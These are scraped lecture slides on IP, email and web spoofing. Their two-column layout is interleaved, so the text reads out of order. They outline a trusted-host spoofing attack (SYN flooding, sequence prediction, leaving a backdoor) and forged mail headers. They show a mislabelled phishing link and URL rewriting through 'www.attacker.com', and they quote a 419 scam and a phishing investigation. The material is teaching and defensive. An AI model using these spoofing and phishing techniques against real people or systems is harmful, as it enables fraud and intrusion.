Académique Documents
Professionnel Documents
Culture Documents
Basics IP Spoofing
Types of spoofing: • IP spoofing is the creation of TCP/IP packets with
somebody else's IP address in the header.
• IP spoofing: Attacker uses IP address of another • Routers use the destination IP address to forward
computer to acquire information or gain access packets, but ignore the source IP address.
• Email spoofing: Attacker sends email but makes • The source IP address is used only by the destination
machine, when it responds back to the source.
it appear to come from someone else
• When an attacker spoofs someone’s IP address, the
• Web spoofing: Attacker tricks web browser into victim’s reply goes back to that address.
communicating with a different web server than • Since the attacker does not receive packets back, this is
the user intended. called a one-way attack or blind spoofing.
• To see the return packets, the attacker must intercept
them.
1
Basic address change (IP spoofing) Source Routing (IP spoofing)
• In Windows go to: control panel + Network • One way for an attacker to see return
+ TCP/IP + IP screens, and simply change traffic from a spoofing attack is for him to
the IP address to the one you want to insert himself in the path the traffic would
spoof and reboot. normally take.
• In UNIX use ifconfig • Internet routing is normally dynamic, there
• All replies go the spoofed address. Since is no guarantee that the same route
TCP requires a 3-way handshake no between 2 IPs is always taken.
session could be established. But a UDP • Source routing can be used to guarantee
attack could work. that a packet follows a set path.
1. Loose source routing (LSR): The sender specifies a list • An attacker sends a packet to the
of some IP addresses that a packet must go through (it destination with a spoofed address but
might go through more)
2. Strict source routing (SSR): The sender specifies the specifies LSR and puts his IP address in
exact path a packet must take (if it is not possible the the list.
packet is dropped)
• The best way to protect against source
• Source routing is supported for diagnosis purposes and to make sure your
traffic does not go thru a competitors network. routing spoofing is to simply disable
• Only 8 hops can be specified in an IP packet header. (Many Internet routes source routing at your routers.
require more hops than this.) That’s why SSR is not practical.
2
Connection establishment
Establishing a TCP
• 3-way handshake algorithm between A
Connection and B
Attacker Send SYN
A B
Receive SYN (client) (server)
SYN,
S eqNu
m=S
Send SYN + ACK N of A
B
Spoofed Receive SYN N of
m=S
+ ACK eqNu fA+
1
+ ACK , S S N o
SYN um =
AckN
Attacker Send ACK ACK,
AckN
um = SN
Receive ACK of B +
1
3
Perform sequence number prediction Summary of steps in IP spoofing
• Selecting a victim
• The trust relationships are reviewed to identify a host
(the spoofed) that has a "trust" relationship with the
PrevSeqNum + victim.
seconds since noon Linux NT 1000*(time-prevTime)
• The trusted host is then disabled (via SYN flooding)
(04:54:35.20972) 17675.20972 321765071 2887495515 -
and the target’s TCP sequence numbers are analyzed.
• The trusted host is then impersonated, the sequence
17680.19562 332010905 2887500502 2887500502
numbers forged (after being calculated).
17686.79997 338617656 2887507109 2887507109 • A connection attempt is made to a service that only
requires IP-based authentication (no user id or
17692.00139 339459049 2887512311 2887512311 password).
17696.80527 334021331 2887517117 2887517117
• If a successful connection is made, the attacker
executes a simple command to leave a backdoor.
• Aliasing Example:
From: Bill Clinton
Sent: Friday, March 22, 2002 4:57 PM
To: Laura Bush
Subject: Romantic dinner?
• Modify mail client
Mail clients must be configured to show the full email address and not
just the alias:
From: Bill Clinton [mailto: bubba@aol.com]
• Telnet to port 25 Sent: Friday, March 22, 2002 4:57 PM
To: Laura Bush
Subject: Romantic dinner?
4
A full email header may look like:
Modifying a Mail Client
• When email is sent by a user, the From: address is not
skip
validated. Return-Path: forged_address@fake.com
Received: from wooftech.net ([207.102.129.200])
by mail0.mailsender.net (5.1.036) id 395BB63B0012CA18
• An attacker can use a mail client to specify whatever for alice@email.net; Thu, 6 Jul 2000 16:43:46 -0700
From: address he wants (Eudora, Outlook) → Received: from localhost ([172.153.252.183]) by popper3.vphos.net ;
Thu, 06 Jul 2000 16:44:53 –0700
X-Originating-IP: [172.153.252.183]
From: forged_address@fake.com
• When the receiver replies, the reply goes to the From: To: alice@email.net
address and not to the person spoofing it. Date: Thu, 06 Jul 2000 17:43:57 -0600
Subject: Anonymous email
Message-ID: <96292709501@popper3.vphos.net>
X-UIDL: d88aeacb3ad5b77467f87f8facaf9ce0
• Email messages should be logged by mail servers, to
permit the actual sender of a message to be determined Assuming the example is not forged, the header implies
during an audit. popper3.vphos.net was the first email server. This means the sender
probably uses the service provider vphos.net.
• Examination of the full email header will often reveal the
actual sender and the machines where the email was
originated.
5
Web Spoofing Web Spoofing
• Web spoofing is tricking someone into One way to lure people to a malicious site is to
visiting a web site other than the one they give it a URL that is similar to that of a legitimate
intend to and mimicking the intended site. site, e.g.,
www.paypai.com
• In this way, an attacker may obtain
wwwFirstNationalBank.com
confidential information.
• They can also provide false or misleading
Another way is for the attacker to provide HTML
information. with a mislabeled link to another page, e.g., in
• They can even create a ‘shadow copy’ of an email. Example:
the whole web to the victim <a HREF="http://www.badhack.org"> American Red Cross</a>
A recent incident
>Subject: Your Assistance
>Date: Mon, 22 Aug 2005 23:33:01 +0000
>
>Your Assistance
>10 NKRUMA WAY,
>MONROVIA, Liberia.
>
>My name is James Odion. I was the director of special duties to president
>Charles Taylor in Liberia. We the former members of government are no
>longer in Liberia. We are currently in exile outside our country.
>
>I am requesting your co operation for immediate acceptance of my
>US$12,000,000.00 {Twelve Million United States Dollars Only}.
• Attackers registered a domain named
>
>This amount is my compensation from unofficial payments made to our
>government by foreign buyers of our major export, diamonds, which were
>under my supervision. As the former Director of Special Duties, President
www.citi.com (as opposed to citibank.com)
>Charles Taylor compensated me with these funds during our last days in
>Liberia before we handed over power to the interim government few years
>back.
>
• Sent emails to the bank’s customer asking
>All that has to do with the US$12M are decent, morally sound, and legal.
>But the money is in United States Dollars, which attracts undue attention
>especially when it is connected with someone in and around government. I
>therefore request that you receive and keep the funds on my behalf until I
them to connect to the new web site (by
>am able to take back control of it in a short period of time.Please reply
>me urgently so you can receive the amount into your bank account. Once the
>money is in your account, feel free to keep 20% of it for your personal
>use as compensation for your efforts, while the balance will be kept for me
simply clicking on the link below) and
>until I can take control of it.
>
>We shall sign a formal partnership agreement and I can also make available
>my detailed profile and photographs to assure you of my honesty and good
reregistering by entering their account
>faith. Send me the following information:
>
>1. Your direct telephone and fax numbers.
>
information (including password)
>2. Bank account details where you want the money transferred into.
>
>I need to call you and speak with you on phone and also fax you the
>relevant documents before the funds will be transferred into your bank
>account.
>Please reply to my alternate email address as soon as possible:
>flonoch@yahoo.co.uk
>
>Yours faithfully,
>James Odion
>
>
6
7/31/2004 Asia Pacific Network Information Centre
Taking down the Citibank scam. OrgID: APNIC
Today, ironicly only a few days after slashdot posted a link to the email fraud iq Address: PO Box 2131
test, I recieved a message from Citibank City: Milton
This would be all fine and good, except I don’t have an account at Citibank, never StateProv: QLD
have, and probaly never will. I immediately suspected a scam. PostalCode: 4064
So, I did a little hacking and discovered that ‘validation link’ really pointed to not a Country: AU
URL, but an IP address. To be precise, the link pointed to ReferralServer: whois://whois.apnic.net
http://61.144.211.22/Verify/ NetRange: 61.0.0.0 - 61.255.255.255
Hmmm. Very odd. CIDR: 61.0.0.0/8
But wait! Theres more. Lets take a look at the email header. NetName: APNIC3
From: Citi Identity Theft Solutions admin419 @citi.com NetHandle: NET-61-0-0-0-1
Subject: Urgent Message From Citibank Parent:
That looks ok so far, but when I expanded the header… NetType: Allocated to APNIC
Citi Solutions admin419 @citi.com NameServer: NS1.APNIC.NET
Subject: Urgent Message From Citibank NameServer: NS3.APNIC.NET
Reply-To: Citi Identity Theft Solutions admin419 @citi.com NameServer: NS4.APNIC.NET
To: apex1 (at) bellsouth.net NameServer: NS.RIPE.NET
Citibank mass routing an email though a bellsouth account? This deffanately ain’t NameServer: TINNIE.ARIN.NET
Citibank, folks. Comment: This IP address range is not registered in the ARIN database.
But just to be sure, lets do a whois lookup on that ip adress (61.144.211.22) to see Comment: For details, refer to the APNIC Whois Database via
who is really behind it all. Comment: WHOIS.APNIC.NET or http://www.apnic.net/apnic-bin/whois2.pl
This is the info I got back.
7
Web spoofing
• On the compromised HTML, the attacker must ensure
that the URLs are modified. For example, if the
attacker’s server is “www.attacker.com”, a link such as
http://www.mybank.com should become
http://www.attacker.com/http://www.mybank.com
• If the victim follows a link on the new page, the page will
again be fetched from the attacker’s server.
• A user can try to avoid being spoofed by checking their
browser’s status/location line before clicking on a link.
(Note that some browsers truncate the left side of the
URL.)
• JavaScript can be used to rewrite the status and location
lines